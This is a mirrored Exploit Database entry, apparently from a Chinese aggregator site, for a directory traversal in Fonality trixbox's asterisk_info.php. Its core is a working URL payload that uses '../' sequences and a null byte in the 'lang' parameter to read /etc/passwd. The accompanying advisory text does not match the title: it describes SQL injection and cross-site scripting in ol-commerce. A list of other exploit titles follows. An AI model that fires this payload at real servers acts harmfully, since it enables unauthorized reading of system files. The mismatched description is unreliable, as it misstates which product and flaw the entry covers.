Fonality trixbox – ‘asterisk_info.php’ Directory Traversal

Exploit Database
18 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2014-07-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39349/

source: https://www.securityfocus.com/bid/68719/info
 
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00

last Exploits
Fonality trixbox – ‘asterisk_info.php’ Directory Traversal的更多信息

Getsimple CMS 2.01 – Local File Inclusion：
WHMCS 4.x – ‘invoicefunctions.php?id’ SQL Injection：
Joomla! Component com_jwmmxtd – Remote File Inclusion：
WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS) (Authenticated)：
PHP Classifieds 6.09 – E-mail Dump：
D-Link DIR-600M – Authentication Bypass (Metasploit)：
FreiChat 9.6 – SQL Injection：
Websense Appliance Manager – Command Injection：